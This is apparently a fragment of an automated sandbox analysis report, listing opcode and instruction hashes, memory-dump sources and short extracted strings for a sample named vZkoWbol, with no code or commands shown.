                                                                    • Opcode ID: 7adb7aac96cfdce39a44ea0808629c3c473f796888a97cf772dcc325f4a13526
                                                                    • Instruction ID: f80ba3ee7ab2418ae43f9493103f89db928cb5c5213539d6efd5826a44412401
                                                                    • Opcode Fuzzy Hash: 7adb7aac96cfdce39a44ea0808629c3c473f796888a97cf772dcc325f4a13526
                                                                    • Instruction Fuzzy Hash: 71213471604204DFCB05CFA8D5C0B26BFA9FB94318F20C56DE90A1B396C77AF406CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9858c9a5f399f80cf33d95b3a1154e417385b7234f67d08d141ee9f35d7d2111
                                                                    • Instruction ID: 4c11443ca256e252d78213615befcd74b51d5947fe3235127446bc26b8f7214c
                                                                    • Opcode Fuzzy Hash: 9858c9a5f399f80cf33d95b3a1154e417385b7234f67d08d141ee9f35d7d2111
                                                                    • Instruction Fuzzy Hash: 92213771504204DFCB15CF68C9C4B26BBE5FB98318F20C56DE9490B352C77AE446CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 353c549473ae65836fb0ae98868b0d4409ab9fcce22639138123747724352b96
                                                                    • Instruction ID: 6193810e5af75149837ae217049568df4f3719560031830c0f0e244dcf3979f8
                                                                    • Opcode Fuzzy Hash: 353c549473ae65836fb0ae98868b0d4409ab9fcce22639138123747724352b96
                                                                    • Instruction Fuzzy Hash: 71212671504248DFDB01DF98D5C4B26BBE9FB94338F20C669E9490B746C37AE406CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1071d54c172bd9616be30f2c62a5e9421403e6b831fa91f08c8bf3ea89eb21ed
• Instruction ID: 6e23af4c78b40692ec82797da41e71292c5bc0210126a0b2b5fa464b612826ff
• Opcode Fuzzy Hash: 1071d54c172bd9616be30f2c62a5e9421403e6b831fa91f08c8bf3ea89eb21ed
• Instruction Fuzzy Hash: 2E014530B001205FDF6286BED81476BBBDADBCA325F118439E50EC7750E959DC420392
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8530d5dc44e8e1be7c1e503189a7a26ed8f569f7448dad9f21c6fee919fca4b9
• Instruction ID: 2c1acfef55f7774f1fb21d3ceacc274c4b6329625a6c977f1862cbc69ffaa4c0
• Opcode Fuzzy Hash: 8530d5dc44e8e1be7c1e503189a7a26ed8f569f7448dad9f21c6fee919fca4b9
• Instruction Fuzzy Hash: 8C11A136B101254BDF449A68C8546AEB3ABEBC8650B028139C80AE7344EE29DC028BD2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 01fc67ea64cdda8401848353eccbe18daa48fdc913b9f390937798e1c424cb65
• Instruction ID: 373b6fd17b4114a504de05a2aafb503adcbfd4c33b36e6b5eb550e5e1bb240ec
• Opcode Fuzzy Hash: 01fc67ea64cdda8401848353eccbe18daa48fdc913b9f390937798e1c424cb65
• Instruction Fuzzy Hash: BD01FC31B041101BDF65963E9854B6F7BDADBC6624F15443AF90EC7751DE18DE0243D2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 116d9ac7cc27f890e48c6131a4047b95a666b08a81ab02e04eadfce87e39efdb
• Instruction ID: b4ec300abb20465b44e330c25b0f985a48d4153673f963acd76bb68471546a04
• Opcode Fuzzy Hash: 116d9ac7cc27f890e48c6131a4047b95a666b08a81ab02e04eadfce87e39efdb
• Instruction Fuzzy Hash: AE21E0B5D01259ABCB00DF9AD885ADEFFB8FB49310F10812AE918A7640D374A554CFE5
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d253f8e41fe7e06b7032a1737579711d1e7714c9b83b0ffd7292c4caf583fec9
• Instruction ID: e734428d9fe1a3662130afb8cb9fe63ea822100e42a807ee2c4d114c7bc6e034
• Opcode Fuzzy Hash: d253f8e41fe7e06b7032a1737579711d1e7714c9b83b0ffd7292c4caf583fec9
• Instruction Fuzzy Hash: A7012430B101210FEF65EBBDE85072E7BD6EFCA645F124529E50ACB3A1EE19DD028381
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
• Instruction ID: 358b8133892900146211b70f372dbe00c0e259a56738d1bf20249dfc3ce7081c
• Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
• Instruction Fuzzy Hash: 7A11DD75504280CFDB02CF64D5C4B15BFA2FB84318F24C6AAD9494B396C33AE40ACFA2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
• Instruction ID: f3572f0e8a4ab1521e83cf889116cfa8940cd8e6252aa4944c6ef7a261895cdf
• Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
• Instruction Fuzzy Hash: B811DD75504284CFDB12CF54C9C4B15BFA2FB88318F24C6ADD8494B252C33AE44ACF62
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
• Instruction ID: 26819a50f525d5ed1305b73ba6f34d275c3fd0000d4c5592e913b42e59c34953
• Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
• Instruction Fuzzy Hash: 5311BF76504284CFDB12CF54D5C4B16FFA1FB84328F24C6AAD8494B656C33AE40ACBA2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57a18e7d0ac7b386801ef0b995d5f95fe47abd4166c1c0da2e5f466dff7d1e09
• Instruction ID: 11a14afb8c1d810bcc51031c4bc4e8d449f657c1d7f57de7cd002b68a26e1e81
• Opcode Fuzzy Hash: 57a18e7d0ac7b386801ef0b995d5f95fe47abd4166c1c0da2e5f466dff7d1e09
• Instruction Fuzzy Hash: EF01F232B140291BDF489AA9DC106BFB7ABDBC8654F16403AC80AE7284EE65CC0247D2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ecc5c0f01fc39ad4c20f81c48eebdec720119a4fc3918e7857cb7177b2e5fda3
• Instruction ID: 2757e133c35f4241ca289985643b43bea1b93cab91566fffaeececfd719f02d2
• Opcode Fuzzy Hash: ecc5c0f01fc39ad4c20f81c48eebdec720119a4fc3918e7857cb7177b2e5fda3
• Instruction Fuzzy Hash: 1111A2B5D01259AFCB00DF9AD884ADEFFB4FB49310F50812AE918B7640D374A554CFA5
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a689621d020825315e70d20681a03248f0117331b17a6106e9df4d3696053fe5
• Instruction ID: bf793e155de5cd4b32f7dc2717269a9239bce5f6a0a092a97366772176a16439
• Opcode Fuzzy Hash: a689621d020825315e70d20681a03248f0117331b17a6106e9df4d3696053fe5
• Instruction Fuzzy Hash: 1801D131B101214BDF659ABED444B2BB3DBDBC9725F118839E90ECB750EE65DC824382
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d063ad9fcd3912b4bb7fd09853ae38e915f68b2f3ef1881fc1b7598998796318
• Instruction ID: 09fcc79ee55c04484c6a9d53a35cd6c709525435b484e5000d60cb4ead8d8c65
• Opcode Fuzzy Hash: d063ad9fcd3912b4bb7fd09853ae38e915f68b2f3ef1881fc1b7598998796318
• Instruction Fuzzy Hash: 8301F431B000110BDF65E67ED454B2EA3DBDBCA625F11883AE90EC7740DE19DD024381
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a8bdf75aa3d73da6fb1a8dd0ddbca832ef5579bae2fee7b926d51a21d8a0e94e
• Instruction ID: bc7ca50123fb4c9d187a76606cc931e4254c1bbcdc481e8e7907f81fbec6ed08
• Opcode Fuzzy Hash: a8bdf75aa3d73da6fb1a8dd0ddbca832ef5579bae2fee7b926d51a21d8a0e94e
• Instruction Fuzzy Hash: 4B014471E102298BDF20DB68E44079EBBA9EB46324F004A3AF80AEF340D631DC45C781
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35d161e2a6a2dba059c03cfc86dacedb471d64e9502e9f52c526dbf9de2b9594
• Instruction ID: 1bd05e73ec48a198c1d4c6577c11bd45c312cbb27be8d402eeebd9f7ba12e555
• Opcode Fuzzy Hash: 35d161e2a6a2dba059c03cfc86dacedb471d64e9502e9f52c526dbf9de2b9594
• Instruction Fuzzy Hash: F201F430B100210BEF50EBBDE850B1E73D6EBCA759F118938E50AC7394EE29EC424381
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e1b724922d2f90a5890d43845aaa3076546460a6ce10af9de112dfd904e539d4
• Instruction ID: ad9016a80e0a63c337b300aa6f56d18d61aa5497f7d1021545ed3d06d74c0f90
• Opcode Fuzzy Hash: e1b724922d2f90a5890d43845aaa3076546460a6ce10af9de112dfd904e539d4
• Instruction Fuzzy Hash: F6E068B0E0D2C86BDF51CB709C5435A7BBCDB06200F3285E6D808CB552E535CE028362
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
• API String ID: 0-2843079600
• Opcode ID: 092c63ddc1fea8cc520e57cc7b8a4563e11f94bc87b42604c901a08089c2fe1b
• Instruction ID: 9fd7fa108b6883409d645f7e74aa3f95160bdedda2bdb049a24d5e8581f9cbbf
• Opcode Fuzzy Hash: 092c63ddc1fea8cc520e57cc7b8a4563e11f94bc87b42604c901a08089c2fe1b
• Instruction Fuzzy Hash: 02122B30E00219CFDF68DF69D894AADB7B2FF88704F218569D809AB654DB349D85CF81
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
• API String ID: 0-1273862796
• Opcode ID: 977454d4d59a18e3d7d4026850f5c9014de1b90825e341ce3a1b9bb35aced33b
• Instruction ID: 644c812b93b7a89ea56adf899bea6731cce8798c6062ed3c2437c5c6084756c3
• Opcode Fuzzy Hash: 977454d4d59a18e3d7d4026850f5c9014de1b90825e341ce3a1b9bb35aced33b
• Instruction Fuzzy Hash: 6991A030A00219DFEF68DF69D680B6E77F6FF84704F198629E841AB650DB789C45CB80
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
• API String ID: 0-981061697
• Opcode ID: 24be183d9d67952eb21e6d412e09c6125f8e269b03ad7323720278d8fb6a06fe
• Instruction ID: e36741318806fd5e22feab6b2ed5554139f62e35030d3fc9fa1571098320d335
• Opcode Fuzzy Hash: 24be183d9d67952eb21e6d412e09c6125f8e269b03ad7323720278d8fb6a06fe
• Instruction Fuzzy Hash: 8CF15C34A00209CFDB58DFA9D590A6EB7B7FF84344F258469D8159B7A4CB39DC82CB81
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID: $]q$$]q$$]q$$]q$$]q$$]q
• API String ID: 0-3723351465
• Opcode ID: e6804053e0f5ba99719fef7de68ef0a3438840c4de690dfa01c71153bc5b81f9
• Instruction ID: 0acbe2122c5340af315eb7e504a92a19c132f423d73f2f6ee599dd48b6d62e96
• Opcode Fuzzy Hash: e6804053e0f5ba99719fef7de68ef0a3438840c4de690dfa01c71153bc5b81f9
• Instruction Fuzzy Hash: 87719E30E002098FDF68DFA9D5A0A6DB7F6FF84314F11852AD806EB654DBB4E945CB81
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID: $]q$$]q$$]q$$]q
• API String ID: 0-858218434
• Opcode ID: 0ab276de552ad736fecf49127e112901c926622f8d66039d19a0d91bfdd55c65
• Instruction ID: 2aab17cb79b29d72e265d21c5c30e3c38bdad6a5544ed7b471d87e3bb9ada046
• Opcode Fuzzy Hash: 0ab276de552ad736fecf49127e112901c926622f8d66039d19a0d91bfdd55c65
• Instruction Fuzzy Hash: 63B14830E002198FDB58DFA9D5906AEB7B6FF84304F258829D806DB754DB39DC86CB80
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
Similarity
• API ID:
• String ID: LR]q$LR]q$$]q$$]q
• API String ID: 0-3527005858
• Opcode ID: bdbb5b8ad7b71a2dda33c9d1b36add8574e628f33794d1020b4807e1817a5c7c
• Instruction ID: 61674e74fe7243dcd7186255db4cd2d90b554c95c101e6f8c5030572b981d3f9
• Opcode Fuzzy Hash: bdbb5b8ad7b71a2dda33c9d1b36add8574e628f33794d1020b4807e1817a5c7c
• Instruction Fuzzy Hash: 6451D130B002159FDB58DF39D980A6ABBF6FF88704F118568E8169B764DB34EC45CB92
Uniqueness
Uniqueness Score: -1.00%